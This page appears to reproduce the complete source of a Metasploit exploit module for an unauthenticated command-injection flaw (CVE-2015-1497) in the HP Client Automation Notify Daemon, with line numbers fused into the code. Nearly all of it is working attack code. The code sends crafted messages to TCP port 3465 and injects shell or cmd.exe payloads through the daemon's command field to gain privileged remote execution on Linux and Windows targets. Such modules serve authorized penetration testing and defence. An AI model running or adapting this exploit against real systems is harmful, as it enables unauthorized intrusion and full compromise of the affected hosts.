Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(update_info(info,13'Name' => 'HP Client Automation Command Injection',14'Description' => %q{15This module exploits a command injection vulnerability on HP Client Automation, distributed16actually as Persistent Systems Client Automation. The vulnerability exists in the Notify17Daemon (radexecd.exe), which doesn't authenticate execution requests by default.1819This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP220and CentOS 5.21},22'Author' =>23[24'Ben Turner', # Vulnerability discovery25'juan vazquez' # Metasploit module26],27'References' =>28[29['CVE', '2015-1497'],30['ZDI', '15-038'],31['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']32],33'Privileged' => true,34'Platform' => %w{ unix win },35'DefaultOptions' =>36{37'WfsDelay' => 1038},39'Payload' => {'DisableNops' => true},40'Targets' =>41[42[ 'HP Client Automation 9.0.0 / Linux',43{44'Platform' => 'unix',45'Arch' => ARCH_CMD,46'Payload' =>47{48'Space' => 466,49'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,50'Compat' =>51{52'PayloadType' => 'cmd',53'RequiredCmd' => 'openssl telnet generic gawk'54},55'BadChars' => "\x27"56}57}58],59[ 'HP Client Automation 9.0.0 / Windows',60{61'Platform' => 'win',62'Arch' => ARCH_X8663}64]65],66'DefaultTarget' => 0,67'DisclosureDate' => '2014-01-02'))6869register_options(70[71Opt::RPORT(3465)72])7374deregister_options('CMDSTAGER::FLAVOR')75deregister_options('CMDSTAGER::DECODER')76end7778def check79connect80sock.put("\x00") # port81sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID82sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password83sock.put("hide\x00") # command84res = sock.get_once85disconnect8687if res && res.unpack('C')[0] == 088return Exploit::CheckCode::Detected89end9091Exploit::CheckCode::Safe92end9394def exploit95case target['Platform']96when 'win'97print_status('Exploiting Windows target...')98execute_cmdstager({:flavor => :vbs, :linemax => 290})99when 'unix'100print_status('Exploiting Linux target...')101exploit_unix102else103fail_with(Failure::NoTarget, 'Invalid target')104end105end106107def exploit_unix108connect109sock.put("\x00") # port110sock.put("0\x00") # user ID111sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password112sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected113disconnect114end115116def execute_command(cmd, opts = {})117connect118sock.put("\x00") # port119sock.put("S-1-5-18\x00") # user ID120sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password121sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected122res = sock.get_once123disconnect124unless res && res.unpack('C')[0] == 0125fail_with(Failure::Unknown, "Something failed executing the stager...")126end127end128end129130131